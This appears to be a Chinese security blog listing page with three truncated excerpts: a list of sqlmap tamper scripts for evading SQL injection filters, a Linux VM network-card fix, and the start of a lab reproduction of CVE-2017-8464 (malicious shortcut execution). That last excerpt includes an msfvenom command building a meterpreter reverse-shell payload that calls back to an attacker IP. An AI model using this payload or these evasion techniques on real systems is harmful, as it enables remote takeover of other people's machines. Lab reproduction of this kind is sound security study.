sqlmap 中常见tamper的作用

01. apostrophemask.py 用UTF-8全角字符替换单引号字符
02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
03. appendnullbyte.py 在payload末尾添加空字符编码
04. base64encode.py 对给定的payload全部字符使用Base64编码
05. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
06. bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符,随后[……]

继续阅读

linux虚拟机网络配置

 

service network restart

弹出界面eth0:错误:没有找到合适的设备:没有找到可用于连接’System eth0′ 的设备
ifconfig 发现eth0网卡不存在

可能原因:

复制或者克隆虚拟机时未修改mac地址

修改方法:

1、vi /etc/udev/rules.d/70-persistent-net.rules
删掉eth0 网卡信息,把eth1改为eth0,并复制mac地址
2、vi /etc/sysconfig/network-scripts/ifctf-eth0
修改mac为刚才复制的
如果虚拟机nat方式联网需要[......]

继续阅读

CVE-2017-8464快捷方式代码执行复现

给你一个快捷方式,你双击了,你就被可黑了。

关于漏洞的复现,github有py脚本:(本次实验不需要)

https://github.com/nixawk/labs/tree/master/CVE-2017-8464

攻击机:kali  192.168.0.111

第一步,创建metasploit payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=1337 -f psh-reflection > xx.ps1

第二步,将payload放置在web上

[……]

继续阅读